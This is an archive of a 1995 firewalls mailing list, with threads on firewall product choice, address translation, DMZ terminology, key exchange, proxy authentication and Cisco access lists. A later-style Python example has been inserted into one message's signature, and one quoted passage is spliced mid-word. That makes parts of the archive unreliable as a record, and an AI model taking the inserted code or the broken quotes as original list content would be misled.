>I am in the process of purchasing a firewall package for the
>company I work for. I have narrowed my choices down to
>Borderware and Firewall-1. Which is a better choice, and why? Is
>there another package out there that is better I may not have
>seen?
>Thanks in advance for responses!!

The first questions that really need to be asked are what are you protecting, what is your security policy, what are you looking to provide service wise.
BorderWare operates as an integrated Firewall and application server, all on one box, running a 'proprietary' hardened operating system. The box allows 100% transparent access to the internet for all standard Internet services, with the ability to define custom services. The BorderWare box has no Unix prompt, and no ability to 'screw it up'. It is 100% menu driven. The BorderWare box includes a full suite of Internet servers (dual DNS, anonymous FTP, POP, WWW, finger, News) all standard. BorderWare also happens to provide IP translation.

Firewall-1 is a stateful packet filter vs. BorderWare's application layer approach. Packet filtering can yield a higher packet throughput (please make sure to compare hardware platforms, and limiting link speeds when evaluating packets per second). Packet filtering can often be more flexible as new services develop. While I in no way want to start any kind of flame war, Firewall-1 can 'easily' be installed in insecure fashions without the administrator being aware of this. This is primarily due to running on top of Sun-OS 'un-hardened', running syslog, allowing login accounts onto the machine (especially prevalent in Netra situations), etc..

Rather than tie up this group any further, feel free to contact www.border.com to find your local reseller, and talk through these issues with them.
-Charles Kaplan

From firewalls-owner Wed Oct 4 19:30:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05748 for firewalls-outgoing; Wed, 4 Oct 1995 19:15:21 -0700 Received: from ingress.com (ioma.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA05741 for ; Wed, 4 Oct 1995 19:15:18 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA02744; Wed, 4 Oct 95 22:07:35 EDT Received: by starlight.ingress.com (4.1) id AA07999; Wed, 4 Oct 95 22:07:54 EDT Date: Wed, 4 Oct 1995 22:07:52 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: re: network address translation Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From: Paul A Vixie
>Date: Wed, 04 Oct 1995 00:26:39 -0700
>Subject: re: network address translation

>>Frank Senter, Senior Information Specialist
>>Missouri Highway and Transportation Department
>>P.O. Box 270, Jefferson City MO 65102

>>I've heard there are a couple of commercial network address translators
>>available for those of us who were foolish enough to build extensive
>>enterprise networks on non-NIC assigned addresses. Does anyone have any
>>real-world experience with such a product?

>At Usenix LISA a few weeks ago in Monterey, CA, the first booth inside the
>front door belonged to a company that sold NAT boxes. They appeared to be
>based on some BSD flavour, and they wanted to sell hardware rather than just
>a software solution. Now if I could only remember their company name. Ah,
>here it is in the vendor directory included with my conference materials:
>Border Network Technologies; Borderware Firewall Server; .

I have to jump in here, as a BorderWare reseller (not the one in Monterey CA). BorderWare is a SOFTWARE company. They don't manufacture or recommend hardware.
Yes, I bet all the resellers sell hardware (convenience, guaranteed compatibility, etc). BorderWare is a SOFTWARE product. The product is based on a hardened port of BSDi. If you were to have a shell on the machine (not possible), but even if you were, it wouldn't execute your code anyway. The kernel effectively only talks to its own authenticable applications.

>Is it possible to kludge such a product together on a commercial firewall?

BorderWare is a commercial firewall, which happens to do IP translation. I just returned from an install of BorderWare at a site that had about 450 hosts, across 2 domains (xx.dec.com and xx.sun.com), and a mix of class A and C addresses none of which belonged to them (they belonged to dec and sun whom this company had placed out of the box onto their net). The install took about 5 hours including training. The customer's first comments back to his boss in front of me were 'excellent performance, I love the box already'. Enough hype.

>And lastly, is the cost/effort of implementing such a product <= effort of
>renumbering 2k hosts?

BorderWare is in my opinion VERY cost effective. Address Translation also gives you a slight twinge of security by obscurity. Coupled with BorderWare's dual name servers ALL internal site information is hidden from the 'hacker' - not in itself secure, but a great start.

-Charles Kaplan
.....a slightly biased BorderWare reseller.....
From firewalls-owner Wed Oct 4 19:53:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA05796 for firewalls-outgoing; Wed, 4 Oct 1995 19:20:48 -0700 Received: from ingress.com (ingress.com [199.171.57.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA05789 for ; Wed, 4 Oct 1995 19:20:44 -0700 Received: from starlight.ingress.com by ingress.com (4.1/SMI-4.1) id AA03403; Wed, 4 Oct 95 22:13:02 EDT Received: by starlight.ingress.com (4.1) id AA08065; Wed, 4 Oct 95 22:13:21 EDT Date: Wed, 4 Oct 1995 22:13:18 -0400 (EDT) From: Charles Kaplan To: firewalls@greatcircle.com Subject: NetSP vs ??? Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>From: toon@cem-bb.e-mail.com
>Date: Wed, 04 Oct 1995 08:12:27 EDT

>I'm always happy when I find overview lists of products or even
>comparisons between products. So I asked RPower@MFI.COM already for
>the '1995 Internet security survey' and I hope I will get it soon.
>So, I liked the response from Luc Vanderschelde (AMDAHL) to Robert
>Tate including a list of products and a reference to a comparison.
>However the IBM product NetSP Gateway was not in the list. Maybe he
>just forgot to mention it. (Hoi, Luc)

>The question now is. I've heard a lot of good things about
>NetSP Gateway at different places. Are there some clients of this
>product on this list, that I can contact to ask them about their
>experiences?

I would recommend searching the archives of this list. I have seen quite a bit of traffic on this subject. Things that stick in my mind:

Un-hardened kernel, and the AIX kernel, perhaps the LARGEST (most code = most bug potential) kernel of all firewalls

Stock sendmail

Either requires SOCKS or running in NON-transparent mode

VERY expensive both for the required hardware and the software.

I think those are the highlights.
Remember, if this is protecting wide area, do you really need all the power of an RS6000 for a T1 link??? or even Ethernet for that matter.

-Charles Kaplan
.....a biased reseller of the BorderWare firewall server.....

From firewalls-owner Wed Oct 4 20:00:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA06218 for firewalls-outgoing; Wed, 4 Oct 1995 19:37:13 -0700 Received: from awadi.com.AU (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA06203 for ; Wed, 4 Oct 1995 19:36:57 -0700 Received: from bunya.awadi ([150.207.1.63]) by awadi.com.AU (4.1/SMI-4.1) id AA18054; Thu, 5 Oct 95 12:04:22 CST Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA10917; Thu, 5 Oct 1995 12:00:52 +0930 From: blymn@awadi.com.AU (Brett Lymn) Message-Id: <9510050230.AA10917@bunya.awadi> Subject: Re: Encryption strength To: njs@scifi.maid.com (Nick Simicich) Date: Thu, 5 Oct 1995 12:00:53 +0930 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Nick Simicich" at Oct 4, 95 08:08:33 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

According to Nick Simicich:
>
>The new version of IBM's firewall provides this function. To set up a
>secure channel, you describe the channel, and it cuts a diskette, which
>you fedex to the other party.
>

How .... ummmmm..... trusting of you. I suppose it really depends on the level of security you are looking for but you did consider that the fedex package may get intercepted? Delivered to the incorrect person (say, the janitor)? Exchanging encryption keys is always a thorny problem since the key _is_ your data security - if it is subverted then your encryption is useless.
--
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three
hundred and sixty three elephants, fifty carts of forage, the monsoon's
about to break and we're wearing ... we're wearing ... sort of things, like
glass, only dark... dark glass things on our eyes..."
        - Terry Pratchett "Moving Pictures".

From firewalls-owner Wed Oct 4 20:13:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA06161 for firewalls-outgoing; Wed, 4 Oct 1995 19:35:30 -0700 Received: from westie.mid.net (westie.mid.net [198.247.250.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA06147 for ; Wed, 4 Oct 1995 19:35:24 -0700 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by westie.mid.net (8.6.10/8.6.9) with ESMTP id VAA16004; Wed, 4 Oct 1995 21:33:58 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id VAA29187; Wed, 4 Oct 1995 21:34:14 -0500 From: Alan Hannan Message-Id: <199510050234.VAA29187@gaijin.mid.net> Subject: Re: WWW & Proxy Servers To: stuart@loddon.demon.co.uk Date: Wed, 4 Oct 1995 21:34:13 -0500 (CDT) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: from "stuart@loddon.demon.co.uk" at Oct 4, 95 01:29:38 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2328 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Good day:

] Apologies if the following questions have been asked before - if they have, I can't
] find them!

The WWW user authentication is a very valid question, one that we have been considering as our firewall systems mature.

] i) Is/Are there any proxy servers for WWW to restrict access to the WWW on
] a username basis AND to further restrict use of 'sub-protocols' supported
] by WWW such as ftp, gopher ...
] again on a username basis?

I have not seen a large desire for this, however it would certainly be nice to have the capacity to provide filtering on that. I would think it could be hacked into existing http gateways......

] ii) If yes to i), can you provide pointers please?

Sorry...

] iii) If no to i), is the requirement technically feasible - if so, any clues?

Yes, it is possible; my discussions with people have involved implementing such in a manner where:

    A) User A from IP Node A authenticates himself
    B) Entry made in table for User A == Node A
    C) If no requests from User A in time 'T' then the entry in the table is flushed.
    D) Until that time, Node A's requests come through no prob.

Another thought has been given to doing something of this nature with SSL, and still another with the reference field in the requests, but I haven't spent too much time on it.

] iv) If the above has been done, has it been integrated with strong authentication
] tokens e.g. SecureID, Digital Pathways or even S/Key?

That would be easy to include with step A.

I know of two companies that are interested in doing this. However, neither of them have expertise in firewalls, though they do in programming. (ie they're both r&d departments of companies). If you're still interested and don't find an existing product (I know of none) then come to me, and we'll see about maybe putting together a project.......

--
Alan Hannan                      Email: alan@mid.net
Network Systems/Security         Voice: (402) 472-0239
MIDnet, Lincoln NOC Office       Fax:   (402) 472-0240
" The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man.
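The table-driven scheme Alan sketches above (authenticate, record user == node, flush after idle time T, pass the node's requests until then), with the per-user sub-protocol restriction Stuart asked about layered on it, as an added example that is not code from the list or from any product. Timeout, user policy, addresses and URLs are constructed; the strong-token check is reduced to a boolean the caller supplies. The caveat a practitioner should notice is that the entry is keyed on the node's IP address, so anyone sharing or impersonating that node inherits the session until it expires.

```python
"""Session table for a user-authenticating WWW proxy (added example)."""
from urllib.parse import urlsplit

IDLE_TIMEOUT = 600  # T: seconds of inactivity before an entry is flushed (constructed)

# Constructed policy: which URL schemes ("sub-protocols") each user may reach.
POLICY = {
    "alice": {"http", "ftp", "gopher"},
    "bob": {"http"},
}


class ProxySessions:
    def __init__(self, timeout=IDLE_TIMEOUT, policy=POLICY):
        self.timeout = timeout
        self.policy = policy
        # Step B: node address -> (user, time of last request).
        # Keyed on the node, so whoever can send from that address shares the entry.
        self.table = {}

    def login(self, user, node, now, token_ok):
        """Step A: record User == Node once the (token) authentication passed.

        token_ok stands in for the S/Key or token verification result.
        """
        if not token_ok or user not in self.policy:
            return False
        self.table[node] = (user, now)
        return True

    def flush_idle(self, now):
        """Step C: drop every entry that has been idle longer than T."""
        for node, (_, last_seen) in list(self.table.items()):
            if now - last_seen > self.timeout:
                del self.table[node]

    def authorize(self, node, url, now):
        """Step D: decide whether a request from node for url may pass.

        Returns a short verdict string; a permitted request refreshes the entry.
        """
        self.flush_idle(now)
        entry = self.table.get(node)
        if entry is None:
            return "deny: not authenticated"
        user, _ = entry
        scheme = urlsplit(url).scheme.lower()
        if scheme not in self.policy[user]:
            return f"deny: {scheme} not allowed for {user}"
        self.table[node] = (user, now)
        return f"allow: {user}"


if __name__ == "__main__":
    sessions = ProxySessions()
    sessions.login("alice", "10.1.1.5", now=1000, token_ok=True)
    print(sessions.authorize("10.1.1.5", "ftp://ftp.example.com/pub/", now=1010))
    print(sessions.authorize("10.1.1.5", "http://www.example.com/", now=2000))
```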
" - George Bernard Shaw

From firewalls-owner Wed Oct 4 20:30:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA08415 for firewalls-outgoing; Wed, 4 Oct 1995 20:26:28 -0700 Received: from mail-relay1.cis.yale.edu (mail-relay1.cis.yale.edu [130.132.21.199]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA08402 for ; Wed, 4 Oct 1995 20:26:24 -0700 Received: from capitoline.cis.yale.edu by mail-relay1.cis.yale.edu with SMTP id AA24684 (5.67a/IDA-1.5 for ); Wed, 4 Oct 1995 23:19:00 -0400 Received: from minerva.cis.yale.edu (minerva [130.132.143.250]) by capitoline.cis.yale.edu (8.6.12/8.6.12) with ESMTP id XAA05171 for ; Wed, 4 Oct 1995 23:24:55 -0400 Received: (from adept@localhost) by minerva.cis.yale.edu (8.6.12/8.6.12) id XAA22561; Wed, 4 Oct 1995 23:24:52 -0400 Date: Wed, 4 Oct 1995 23:24:51 -0400 (EDT) From: Ben X-Sender: adept@minerva To: firewalls@greatcircle.com Subject: Re: Encryption strength In-Reply-To: <9510050230.AA10917@bunya.awadi> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> How .... ummmmm..... trusting of you. I suppose it really depends on
> the level of security you are looking for but you did consider that
> the fedex package may get intercepted? Delivered to the incorrect
> person (say, the janitor)?

Use the Shamir Sharing algorithm to break the key up into n parts. Send the n parts via n different vectors--phone, USPS, UPS, FedEx, Fax, e-mail, etc. As long as no one gets more than n/2 parts, it doesn't matter if they subvert the key.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran.
SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net  http://www.netresponse.com/zldf

From firewalls-owner Wed Oct 4 20:55:49 1995
From: Alan Hannan
Message-Id: <199510050330.WAA29521@gaijin.mid.net>
Subject: Re: DMZ definition ?
To: dasidwel@us.oracle.com
Date: Wed, 4 Oct 1995 22:30:28 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9510042317.AA28157@mailsun2.us.oracle.com> from "David Sidwell" at Oct 4, 95 04:09:49 pm

The term DMZ grew out of the border area between North and South Korea (or was it Vietnam? I wasn't alive for either...). We could argue all day about which of the following more exactly fits the definition of a DMZ, but that's what college professors are for :)

IMHO a DMZ is any network which sits between two other networks which, for whatever reason, have a problem with each other.

] Can anyone give me a concise definition of the term Demilitarized Zone, or DMZ

See above.

] for short, in connection with firewall terminology ? I am under the belief,
] perhaps incorrectly, that it is used to refer to any kind of screened subnet
] placed between the internal networks and the Internet (or other external
] networks).
Agreed.

] A colleague of mine is convinced that it is a separate subnet hung
] off a single firewall machine.

That's kind of fuzzy, though it could be construed that this 'logical' network is between the two other networks.

] 1.
]              [ packet  ]                  [ packet  ]
] Internet-----[filtering]----DMZ subnet----[filtering]----internal
]              [ router  ]    (containing   [ router  ]    networks

Yep.

] 2. As above but protected by firewalls instead of packet filtering routers.

Yep.

] 3.
] Internet----firewall----internal networks...
]                |
]                |
]               DMZ
]              subnet

3 == 1 logically. One could implement a system w/ 3 that did the same thing.

] Finally, does a DMZ implementation always prevent direct IP forwarding from
] Internet to internal nets ?

Nope. For whatever reason, network 1) above could allow telnets from the far left to the far right, and I'd have no problem with it, and would call it a DMZ. (Actually, I would have a problem allowing telnets directly into my network, but I'd still whore myself out to the customer if their security policy allowed it. This is where me and the 'experts' part company.)

-- 
Alan Hannan                    Email: alan@mid.net
Network Systems/Security       Voice: (402) 472-0239
MIDnet, Lincoln NOC Office     Fax:   (402) 472-0240

" The reasonable man adapts himself to the world; the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man. " - George Bernard Shaw

From firewalls-owner Wed Oct 4 21:00:43 1995
Date: Wed, 4 Oct 1995 23:49:50 -0400 (EDT)
From: "A. Padgett Peterson, P.E.
Information Security"
To: firewalls@greatcircle.com
Message-Id: <951004234950.2104b6a4@hobbes.orl.mmc.com>
Subject: re: Encryption strength

>The new version of IBM's firewall provides this function. To set up a
>secure channel, you describe the channel, and it cuts a diskette, which
>you fedex to the other party.

Now this will work, but the One True Solution will be one in which you can create a secure channel and authenticate *on the fly* over it. This is why I find the Netscape mechanism so appealing - a secure channel is created without needing any authentication. At this point, all you need is a shared secret - no passphrases, no floppy disks fedexing around the world, etc.

Lotus Notes hierarchy looks good - once the first authentication channel is created, all else *including public key revocation/reissue* can be accomplished. (Too bad the multi-page description is so full of pablum and vagaries - I already know that long keys are good; what I want to know is "how long is long?")

Add in the fact that for SBU, a dial-up PPP might provide an "out of channel" mechanism for an initial trusted *real-time* keyserver (am rapidly coming to the conclusion that if you are not worried about the FBI listening in, POTS is really a good mechanism for such - after all, Joe's public key is meant to be distributed so you are not worried about Confidentiality, Ma Bell is handling the Availability, so all you need is Integrity to avoid men in the middle). A U-Dial-It is hard to spoof and Caller-ID (FCC said this year everywhere) provides node validation, & once you have a public key you can trust from the host, all else is easy.

Naturally, this is just in time for corporate Amurrica to go into a panic over modems when all they need is a (C)LASS capable switch...

The fact is I can see where we are going to be and it is a wonderful place.
Do expect the vendors to do their homework though, so am not going to grind it all the way down - want them to show me they understand the problem.

The really funny part is that certification via a trusted central authority is essential. The big difference between this and key escrow is one critical element - the authority will not have any private keys except its own; rather it will be a point of verification. Corporations may serve as their own, but in that case there will need to be a means for them to be able to monitor employees - not a matter of civil rights, rather property rights, so either they will hold the secret keys or MicroVault (hi Nick) will do a land office business in electronic lockboxes.

The marvel of it all is seeing the pieces become available (one of the more fun parts of my job is pointing people with problems at people with solutions. Sometimes the problem people don't know they have one and the solutions people do not know they have one either. Then it's really enjoyable, and lately both sets have been vendors (even more fun). Now if they would just catch on to '70s style hospitality suites...)

The real message is that what we have is like colour television in 1960. We are not breaking any new ground (and I wish someone would tell the patent lawyers that); all the technology we need is available, it is just a matter of putting it all together and watching that peacock spread its tail.

Warmly,
Padgett

ps seems like I saw a reference somewhere to a set of locks (Chubb ?) nigh on 150 years ago that used one set of keys to lock a door, and a second set was required to open it. If things get irritating, I might even research it.
From firewalls-owner Wed Oct 4 21:26:15 1995
To: alan@mid.net, firewalls-digest@greatcircle.com
Subject: Re: WWW & Proxy Servers
In-reply-to: Your message of "Wed, 04 Oct 1995 21:34:13 EDT." <199510050234.VAA29187@gaijin.mid.net>
Date: Thu, 05 Oct 1995 00:09:01 EDT
From: "James Croall"

> Yes, it is possible, my discussions with people have involved
> implementing such in a matter where:
>
> A) User A from IP Node A authenticates himself
>
> B) Entry made in table for User A == Node A
>
> C) If no requests from User A iith the reference field
> in the requests, but I haven't spent too much time on it.

I've been playing with something like that, for accessing a firewalled WWW server with proper authentication:

A) User A from IP Node A authenticates himself to the server over Basic HTTP Access Authorization using some sort of one-time password system.

B) The server adds an entry to a table: User A : Node A : Authentication method & "password"

C) The combination is valid for some time T. If it is used in that time T, the time gets extended. If it is "idle" for T, it is removed from the table.

> Another thought has been given to doing something of this
> nature with SSl, and still another with the reference field
> in the requests, but I haven't spent too much time on it.

Hence a user could connect to an accessible machine, authenticate themselves, and have access to a proxy server.
Of course, this whole system falls apart without some type of encryption ;)

>] iv) If the above has been done, has it been integrated with strong authentication
>] tokens e.g. SecureID, Digital Pathways or even S/Key ?
>
> That would be easy to include with step A.

The whole system is relatively easy; in fact I implemented it as a little toy a little while ago, adding HTTP proxy support, S/Key authentication, and SSL (based on the SSLeay package) all on top of NCSA 1.4. As far as I played with it, it seemed to work. If anybody wants to play with it, I can dig up the code.

---
jcroall@tjhsst.edu * jcroall@foo.org
http://www.tjhsst.edu/people/jcroall/

From firewalls-owner Thu Oct 5 00:00:05 1995
Date: Thu, 5 Oct 1995 08:51:43 +0200 (EET)
From: Keinanen Vesa
To: Paul A Vixie
Cc: firewalls@greatcircle.com, Mike Shaver
Subject: Re: Network Address Translation stuff
In-Reply-To: <9510042047.AA27158@wisdom.home.vix.com>

> slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary
> address assignments, and accomplishes its goals without any layering
> violations -- in particular the user data is never interpreted. This goes
> to show that it can be done without searching for PORT verbs in user data.
>

How is that possible?
The FTP client announces its IP address/port to the other party using the PORT command and then waits for an incoming connection to that address. In this case the host address is not reachable from the outside world. If direct IP routing is blocked and internal addresses are not announced to the outside world, you cannot make host addresses reachable with "DNS tricks" or any other tricks.

I still don't think that even IBM can do address translation without modifying the FTP PORT command: you either modify the PORT command packet-per-packet (as NATs seem to do) or you re-create the necessary commands (as FTP proxies do).

VK
-- 
Vesa Keinanen        Nasilinnankatu 24 D, 33210 Tampere, Finland
Relevantum Oy        Phone +358 31 2147200, Fax +358 31 2147402

From firewalls-owner Thu Oct 5 00:13:49 1995
Message-Id: <9510050656.AA27394@wisdom.home.vix.com>
To: firewalls@greatcircle.com
Subject: Re: Network Address Translation stuff
In-Reply-To: Your message of "Thu, 05 Oct 1995 08:51:43 +0200."
Date: Wed, 04 Oct 1995 23:56:32 -0700
From: Paul A Vixie

> I still don't think that even IBM can do address translation
> without modifying FTP PORT command: you either modify PORT command
> packet-per-packet (as NAT:s seem to do) or you re-create necessary
> commands (as FTP proxy's do it).

The trick is to use an FTP proxy without the client having to know that it's talking to an FTP proxy.
With a simple DNS trick and a complicated FTP proxy, you can make these ends meet. The thought of modifying PORT verbs in-stream makes my skin crawl.

From firewalls-owner Thu Oct 5 01:52:44 1995
Date: Thu, 5 Oct 1995 17:55:57 --1000
From: pcooper@macquarie.com.au (Peter Cooper)
Message-Id: <9510050755.AA13453@macbank>
To: Firewalls@GreatCircle.COM
Subject: What's the admin effort

We're considering the business case for a firewall product at the moment. I've been asked how much of a person's (or multiple people's) time would be taken up in day-to-day operational control of a firewall, in terms of monitoring the activity and change management. Is there any sort of benchmarking of this activity that people are aware of? I'd be interested in any statistics or experience people have had.
Peter Cooper

From firewalls-owner Thu Oct 5 02:22:34 1995
Message-Id: <199510051019.LAA03898@post.med.uni-marburg.de>
From: "D.A. Meyer"
To: firewalls@greatcircle.com
Date: Thu, 5 Oct 1995 10:12:43 +0000
Subject: http-gw on dual-homed gateways
Reply-To: meyerd@post.med.uni-marburg.de

Hi, my question of the day is: has anybody tried to run TIS http-gw on a dual-homed gateway? The proxy has to rewrite the URL, and it seems to do it using the outside interface name/address (gethostname + gethostbyname). When I change the hostname so that it is connected to the IP address of the internal interface, my mail proxy won't work. Has anybody built a patch which rewrites the address depending on the interface on which the client request came in? Any other idea?

Thanx
Dirk

-----------------------------------------------------------------
Dirk A. Meyer                              meyerd@mailer.uni-marburg.de
Klinikum der Philipps-Universitaet Marburg    Tel. xx49-6421-28-6291
Med.
Informatik                                    Fax. -------------8921
Bunsenstr. 3, D-35033 Marburg/Lahn
-----------------------------------------------------------------

From firewalls-owner Thu Oct 5 02:30:13 1995
From: Ilias Liakopoulos
Message-Id: <199510050905.KAA23641@pina2.telecom.at>
Subject: cisco router extended access-list question
To: firewalls@GreatCircle.COM
Date: Thu, 5 Oct 1995 10:05:49 +0100 (MEZ)

Hello,

I have set up an access-list like the example in UnileverCD for allowing only SMTP connections (the IP addrs are invented):

access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established
access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25

SMTP works, but with this config I tried telnet and it also works. This is not acceptable, and if I remove the established line -> nothing works.

The interface config:

interface Ethernet0
 ip address 2.2.3.2 'some adr mask'
 ip access-group 102 out

Have I done something wrong in the config or is this a bug in our version?:

Cisco Internetwork Operating System Software
IOS (tm) 4000 Software (XX-K), Version 10.0(6), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1994 by cisco Systems, Inc.
Compiled Tue 25-Oct-94 19:29 by dougs
ROM: System Bootstrap, Version 4.14(7), SOFTWARE
System image file is "xk10060z", booted via flash
cisco 4000 (68030) processor (revision 0xB0) with 16384K/4096K bytes of memory.
Processor ID 5012216

thanx,
iLiAS

----------------------------------------------------------------------
Ilias Liakopoulos        | Email: ilias@telecom.at
Spardat AG & Co KG       | Tel: 0043/1/74045-4762  Fax -5704
Geiselbergstr. 21-25     | WWW: http://pina2.telecom.at/~lia
1110-Vienna              | nic-hdl: IL7-RIPE
Austria | Europe         |
----------------------------------------------------------------------

From firewalls-owner Thu Oct 5 02:39:11 1995
Date: Thu, 5 Oct 1995 11:05:43 +0200 (EET)
From: Keinanen Vesa
To: Paul A Vixie
Cc: firewalls@greatcircle.com
Subject: Re: Network Address Translation stuff
In-Reply-To: <9510050656.AA27394@wisdom.home.vix.com>

On Wed, 4 Oct 1995, Paul A Vixie wrote:

> The trick is to use an FTP proxy without the client having to know that
> it's talking to an FTP proxy. With a simple DNS trick and a complicated
> FTP proxy, you can make these ends meet.
>

OK, I get it: the IBM NAT box has application-level proxies inside instead of packet-per-packet address translation. (BTW, do you know where I can find info about this IBM box?
A quick search on the IBM Web site didn't get me anything.)

Let me try to summarize this subject a bit. There seem to be (at least) two different techniques for address translation:

* Translate IP addresses on each IP packet that goes through, otherwise let packets go through unmodified. Handling FTP requires some dirty tricks like modifying data inside IP packets that contain FTP PORT commands. Invisible to users.

* Use application-level proxies. This can be made invisible to users by using transparent proxies.

Packet-by-packet address translation may be dirty in some sense, but on the other hand it doesn't require its own process on each connection and requires just a little state information. It can be implemented on a standalone box with no disks and limited main memory (like a router).

Maybe some day someone will announce a "proxy firewall router" which claims to have the best features of both worlds. Maybe at this moment the guys at translation.com are rewriting their sales material and a "new" kind of out-of-box firewall will pop into the market.
VK
-- 
Vesa Keinanen        Nasilinnankatu 24 D, 33210 Tampere, Finland
Relevantum Oy        Phone +358 31 2147200, Fax +358 31 2147402

From firewalls-owner Thu Oct 5 02:52:45 1995
Date: Thu, 5 Oct 1995 18:44:09 +0900
Message-Id: <199510050944.SAA14194@re.enicom.co.jp>
From: Shuzo Ishihara
To: firewalls@GreatCircle.COM
Subject: Please tell me adequate books and articles about Firewalls.

I'm a novice at Internet and firewall security. I have read the book "Firewalls and Internet Security" by William R. Cheswick and Steven M. Bellovin. This book is very useful and I learned the framework of firewalls from it. But there are only a couple of models of firewalls in this book. I think that there are more types of firewall model, and I need more systematized learning about them. I would be very grateful to someone who would tell me sources of information containing illustrations, that is, books, articles and others.
S.Ishihara
ishihara@re.enicom.co.jp

From firewalls-owner Thu Oct 5 03:22:34 1995
To: Firewalls@greatcircle.com
From: Lars Hornborg
Subject: Re: Address Translators
Reply-To: lasseh@microfront.se
In-Reply-To: <199509291355.GAA01364@miles.greatcircle.com>
Message-Id: <1995Oct05.110526+0200@lhpc>
Date: 05 Oct 1995 11:05:24 +0200

A commercial NAT product is Private Internet Exchange from Network Translation Inc. Any positive things I say about it on this list would be biased, since we distribute it in Sweden, but I'll say this: it's a helluva product! NTI have a Web site at www.translation.com.

Lars.

PS Any thoughts regarding weaknesses or strengths in this kind of solution are welcome, since the NAT approach is fairly new and needs to be discussed.
DS
-- 
__________________________________________________________________________
Lars Hornborg, Tech mgr        Tel:      +46-47010150
Microfront Vaxjo AB            Fax:      21150 (67929 home)
Sjoeuddev 8,                   Internet: lasseh@microfront.se
S-352 46 VAXJO, SWEDEN         X400:     /S=lasseh/P=microfront/A=interx/C=se
_________________________________________________________________________

From firewalls-owner Thu Oct 5 03:30:01 1995
Message-Id: <199510051021.DAA19288@miles.greatcircle.com>
From: Dave Wade
To: Firewalls@GreatCircle.COM
Subject: Re: Mail proxy
Date: Thu, 5 Oct 1995 09:54:06 +0000

>>1) it is *impossible* to prevent a determined individual from
>>transferring executables via email. (But you can slow them down)
>
>Quibble: if you block the common mechanisms, then it will take ->two<-
>individuals, one - perhaps unwitting - to install the decode/execute
>mechanism on the inside.

Rather than invent a new encoding, the two individuals might just use SNAIL MAIL to exchange programs. Floppies through the mail normally give a consistent throughput at low cost and avoid all those nasty scanners in the firewall. Much less traceable as well in most companies.
Warmley,
Dave Wade
dw@sss.co.uk

From firewalls-owner Thu Oct 5 04:22:34 1995
From: Paul Crossley
To: ilias.liakopoulos@telecom.at, firewalls@GreatCircle.COM
Subject: cisco router extended access-list question
Date: Thu, 5 Oct 1995 12:07:28 +0100 (BST)
Message-ID: <9510051207.aa21699@gateway.toploguk.co.uk>

>
> I have set up an access-list like the example in UnileverCD
> for allowing only SMTP connections (the IP addrs are invented):
>
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established
> access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25
>
> SMTP works but with this config I tried telnet and it also works .
> this is not acceptable and if I remove the established line ->
> nothing works.
> the interface config:
>
> interface Ethernet0
> ip address 2.2.3.2 'some adr mask'
> ip access-group 102 out

The established keyword allows any established TCP session through the interface. SMTP may be initiated from the "wrong" side, so it will not be established in the first instance, so another filter is required.

What your filters are saying is that any packets destined for hosts connected to (inside) ethernet0 will be allowed out so long as the TCP session was initiated from a host on ethernet0; this is because they are part of an "established" session. Because SMTP connections may be initiated from hosts that are not connected to ethernet0, a second filter is required to allow SMTP sessions out to ethernet0.
Your telnet probably works because you are initiating the connection from a host connected to (inside) ethernet0; the response packets will therefore be permitted out through ethernet0 by the "established" filter. If you try telneting to a host connected to ethernet0 from another interface, I think that you'll find that you can't.

Without the established line, the only thing that should work is SMTP from any interface other than ethernet0 to a host on ethernet0.

